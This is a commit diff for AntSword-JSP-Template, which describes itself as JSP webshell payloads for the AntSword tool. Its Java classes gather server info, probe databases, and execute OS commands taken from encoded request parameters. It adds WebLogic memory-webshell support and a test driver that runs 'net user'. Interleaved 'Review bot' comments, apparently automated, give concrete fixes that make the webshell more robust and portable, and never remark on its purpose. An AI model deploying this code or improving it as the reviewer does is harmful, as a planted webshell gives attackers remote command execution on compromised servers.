update to v 1.4
1. 兼容JDK6
2. 兼容weblogic内存webshell
3. 优化报错信息
4. 解决windows下中文乱码的问题
5. 不再支持response作为入口参数
6. 增加用于测试的Web项目
yzddmr6 committed Feb 2, 2021
1 parent 1e780b1 commit ed2489f
Showing 43 changed files with 1,003 additions and 1,204 deletions.
1 change: 1 addition & 0 deletions .gitignore
Expand Up @@ -2,3 +2,4 @@
*.class
.idea/
dist/*
out/
24 changes: 24 additions & 0 deletions AntSword-JSP-Template.iml
@@ -0,0 +1,24 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="JAVA_MODULE" version="4">
<component name="FacetManager">
<facet type="web" name="Web">
<configuration>
<descriptors>
<deploymentDescriptor name="web.xml" url="file://$MODULE_DIR$/web/WEB-INF/web.xml" />
</descriptors>
<webroots>
<root url="file://$MODULE_DIR$/web" relative="/" />
</webroots>
</configuration>
</facet>
</component>
<component name="NewModuleRootManager" inherit-compiler-output="true">
<exclude-output />
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
<orderEntry type="library" exported="" name="lib" level="project" />
</component>
</module>
17 changes: 13 additions & 4 deletions README.md
@@ -1,11 +1,11 @@
# AntSword-JSP-Template v1.3
# AntSword-JSP-Template v1.4
中国蚁剑JSP一句话Payload

详细介绍:https://yzddmr6.tk/posts/antsword-diy-3/

编译环境:jdk7 + tomcat7
编译环境:jdk6 + tomcat7

适用范围:jdk7 - jdk14
适用范围:jdk6及以上

## 编译

Expand Down Expand Up @@ -97,10 +97,19 @@ shell.jspx
</jsp:scriptlet>
</jsp:root>
```
其中`pageContext`可以替换为`request`或者`response`,以实现对Tomcat内存Webshell的兼容
其中`pageContext`可以替换为`request`,以实现对内存Webshell的兼容。

## 更新日志

### v 1.4

1. 兼容JDK6
2. 兼容weblogic内存webshell
3. 优化报错信息
4. 解决windows下中文乱码的问题
5. 不再支持response作为入口参数
6. 增加用于测试的Web项目

### v 1.3

1. 兼容SpringBoot
2 changes: 1 addition & 1 deletion build.py
Expand Up @@ -6,7 +6,7 @@
import shutil
import subprocess

javapath = r'C:\Program Files\Java\jdk1.7.0_75\bin\javac.exe' # javac路径
javapath = r'C:\Program Files (x86)\Java\jdk1.6.0_43\bin\javac.exe' # javac路径
classpath = os.getcwd()+"/lib" # apache lib路径
classpath = classpath+"/servlet-api.jar;" + classpath+"/jsp-api-2.1.jar" # 拼接classpath
if os.path.exists("./dist/"):
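Review bot: `javapath` is still an absolute path to one developer's JDK install (`C:\Program Files (x86)\Java\jdk1.6.0_43`), so the build script breaks for anyone else checking out the repository, and the `;` in the `classpath` concatenation two lines below is the Windows-only separator. Derive both from the environment, keeping the current value as a fallback: `javapath = os.path.join(os.environ.get('JAVA_HOME', r'C:\Program Files (x86)\Java\jdk1.6.0_43'), 'bin', 'javac.exe')` and `os.pathsep` in place of the literal `;`. The rest of build.py is outside this hunk.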
14 changes: 0 additions & 14 deletions src/AntSword-JSP-Template.iml

This file was deleted.

50 changes: 21 additions & 29 deletions src/base/Info.java
@@ -1,3 +1,5 @@
package base;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.File;
Expand All @@ -14,7 +16,7 @@ public boolean equals(Object obj) {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ex) {
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Expand All @@ -24,40 +26,30 @@ public boolean equals(Object obj) {
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception e) {
e.printStackTrace();
}
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

} else if (obj instanceof HttpServletResponse) {
response = (HttpServletResponse) obj;
try {
Field resp = response.getClass().getDeclaredField("response");
resp.setAccessible(true);
HttpServletResponse response2 = (HttpServletResponse) resp.get(response);
Field req = response2.getClass().getDeclaredField("request");
req.setAccessible(true);
request = (HttpServletRequest) req.get(response2);
} catch (Exception e) {
e.printStackTrace();
}
}
}
}
cs = request.getParameter("charset") != null ? request.getParameter("charset") : "UTF-8";
cs = "UTF-8";
StringBuffer output = new StringBuffer("");
StringBuffer sb = new StringBuffer("");
String tag_s = "->|";
String tag_e = "|<-";
try {
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
output.append(tag_s);
sb.append(SysInfoCode(request));
output.append(sb.toString());
output.append(tag_e);
response.getWriter().print(output.toString());
output.append(SysInfoCode(request));
} catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
output.append("ERROR:// " + e.toString());
}
try {
response.getWriter().print(tag_s + output.toString() + tag_e);
} catch (Exception ignored) {
}
return true;
}
Expand All @@ -83,15 +75,15 @@ String SysInfoCode(HttpServletRequest r) {
}

String WwwRootPathCode(String d) {
String s = "";
if (!d.substring(0, 1).equals("/")) {
StringBuilder s = new StringBuilder();
if (!d.startsWith("/")) {
File[] roots = File.listRoots();
for (int i = 0; i < roots.length; i++) {
s += roots[i].toString().substring(0, 2) + "";
for (File root : roots) {
s.append(root.toString(), 0, 2);
}
} else {
s += "/";
s.append("/");
}
return s;
return s.toString();
}
}
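Review bot: If `obj` is neither a PageContext nor an HttpServletRequest — for example an HttpServletResponse, the entry type this commit stops supporting — `request` and `response` are still null after the resolution block, `response.setContentType` throws an NPE that is recorded in `output`, and the final `response.getWriter()` throws again inside `catch (Exception ignored)`, so the failure is completely silent. Guard before `cs = "UTF-8";` with `if (request == null || response == null) { return true; } // unsupported entry object: nothing to write to`, so the unsupported-entry case is explicit instead of hidden behind two swallowed exceptions. The empty `catch (Exception ignored)` around the writer also needs a one-line comment stating why a failed write is deliberately dropped. The `equals(Object obj)` method begins above this hunk, and the `request`/`response`/`cs` assignments refer to members declared outside it.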
43 changes: 15 additions & 28 deletions src/base/Probedb.java
@@ -1,3 +1,5 @@
package base;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.lang.reflect.Field;
Expand All @@ -13,7 +15,7 @@ public boolean equals(Object obj) {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ex) {
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Expand All @@ -23,46 +25,31 @@ public boolean equals(Object obj) {
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception e) {
e.printStackTrace();
}
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

} else if (obj instanceof HttpServletResponse) {
response = (HttpServletResponse) obj;
try {
Field resp = response.getClass().getDeclaredField("response");
resp.setAccessible(true);
HttpServletResponse response2 = (HttpServletResponse) resp.get(response);
Field req = response2.getClass().getDeclaredField("request");
req.setAccessible(true);
request = (HttpServletRequest) req.get(response2);
} catch (Exception e) {
e.printStackTrace();
}
}
}
}

cs = "UTF-8";
StringBuffer output = new StringBuffer("");
StringBuffer sb = new StringBuffer("");
String tag_s = "->|";
String tag_e = "|<-";
cs = request.getParameter("charset") != null ? request.getParameter("charset") : "UTF-8";
try {
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
output.append(tag_s);
sb.append(ProbedbCode(request));
output.append(sb.toString());
output.append(tag_e);
response.getWriter().print(output.toString());
output.append(ProbedbCode(request));
} catch (Exception e) {
sb.append(tag_s + "ERROR" + ":// " + e.toString() + tag_e);
try {
response.getWriter().print(sb.toString());
} catch (Exception ex) {

}
output.append("ERROR:// " + e.toString());
}
try {
response.getWriter().print(tag_s + output.toString() + tag_e);
} catch (Exception ignored) {
}
return true;
}
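Review bot: The new fallback `request.getClass().getDeclaredMethod("getResponse")` only finds a method declared directly on the runtime class of the request object; `getDeclaredMethod` does not search superclasses, so a container whose request class inherits `getResponse()` from a parent lands in the empty `catch (Exception ignored)` and `response` stays null. If the target's `getResponse()` is public, `request.getClass().getMethod("getResponse").invoke(obj)` also covers inherited methods; otherwise walk `getSuperclass()` until the field or method is found. The same resolution block is duplicated in `Info.java` and `Exec.java` in this commit and should get the same treatment. The enclosing `equals(Object obj)` method starts above this hunk, so the code that produces `request2` is not visible here.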
58 changes: 26 additions & 32 deletions src/command/Exec.java
@@ -1,3 +1,5 @@
package command;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
Expand All @@ -21,7 +23,7 @@ public boolean equals(Object obj) {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ex) {
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Expand All @@ -31,29 +33,19 @@ public boolean equals(Object obj) {
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception e) {
e.printStackTrace();
}
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

} else if (obj instanceof HttpServletResponse) {
response = (HttpServletResponse) obj;
try {
Field resp = response.getClass().getDeclaredField("response");
resp.setAccessible(true);
HttpServletResponse response2 = (HttpServletResponse) resp.get(response);
Field req = response2.getClass().getDeclaredField("request");
req.setAccessible(true);
request = (HttpServletRequest) req.get(response2);
} catch (Exception e) {
e.printStackTrace();
}
}
}
}
randomPrefix = "antswordrandomPrefix";
encoder = "base64";
cs = "antswordCharset";
StringBuffer output = new StringBuffer("");
StringBuffer sb = new StringBuffer("");
String tag_s = "->|";
String tag_e = "|<-";
String varkey1 = "antswordargbin";
Expand All @@ -63,23 +55,25 @@ public boolean equals(Object obj) {
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
String z1 = EC(decode(request.getParameter(varkey1) + ""));
String z2 = EC(decode(request.getParameter(varkey2) + ""));
String z3 = EC(decode(request.getParameter(varkey3) + ""));
output.append(tag_s);
sb.append(ExecuteCommandCode(z1, z2, z3));
output.append(sb.toString());
output.append(tag_e);
response.getWriter().print(output.toString());
String z1 = decode(request.getParameter(varkey1));
String z2 = decode(request.getParameter(varkey2));
String z3 = decode(request.getParameter(varkey3));
output.append(ExecuteCommandCode(z1, z2, z3));
} catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
output.append("ERROR:// " + e.toString());
}
try {
response.getWriter().print(tag_s + output.toString() + tag_e);
} catch (Exception ignored) {
}
return true;
}

String EC(String s) throws Exception {
if (encoder.equals("hex")) return s;
return new String(s.getBytes(), cs);
public static void main(String[] args) throws Exception {
Exec exec = new Exec();
exec.cs = "GBK";
String result = exec.ExecuteCommandCode("cmd", "net user", "");
System.out.println(result);
}

String decode(String str) throws Exception {
Expand All @@ -102,7 +96,7 @@ String decode(String str) throws Exception {
ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
}
return baos.toString("UTF-8");
return baos.toString(cs);
} else if (encoder.equals("base64")) {
byte[] bt = null;
try {
Expand All @@ -113,16 +107,16 @@ String decode(String str) throws Exception {
Object decoder = clazz.getMethod("getDecoder").invoke(null);
bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
return new String(bt, "UTF-8");
return new String(bt, cs);
}
return str;
}

String ExecuteCommandCode(String cmdPath, String command, String envstr) throws Exception {
public String ExecuteCommandCode(String cmdPath, String command, String envstr) throws Exception {
StringBuffer sb = new StringBuffer("");
String[] c = {cmdPath, !isWin() ? "-c" : "/c", command};
Map<String, String> readonlyenv = System.getenv();
Map<String, String> cmdenv = new HashMap<>(readonlyenv);
Map<String, String> cmdenv = new HashMap<String, String>(readonlyenv);
String[] envs = envstr.split("\\|\\|\\|asline\\|\\|\\|");
for (int i = 0; i < envs.length; i++) {
String[] es = envs[i].split("\\|\\|\\|askey\\|\\|\\|");
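Review bot: The added `main()` is a local test driver — it hard-codes `cmd` with `net user` and required `ExecuteCommandCode` to be widened to `public` — yet it is compiled into every shipped `Exec.class`. Move it into the test web project this commit introduces (or a separate test class) and keep `ExecuteCommandCode` package-private so the payload class stays minimal. Separately, dropping the `+ ""` on the three `request.getParameter(...)` calls means an absent parameter now reaches `decode(null)`, which appears to end in the `ERROR:// …` branch rather than, as before, decoding the literal string `null`; since `ExecuteCommandCode` calls `envstr.split(...)` unconditionally, make the intended default explicit, e.g. `String raw3 = request.getParameter(varkey3);` / `String z3 = decode(raw3 == null ? "" : raw3);`. The enclosing `equals(Object obj)` starts above the hunk and `decode` continues below it.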
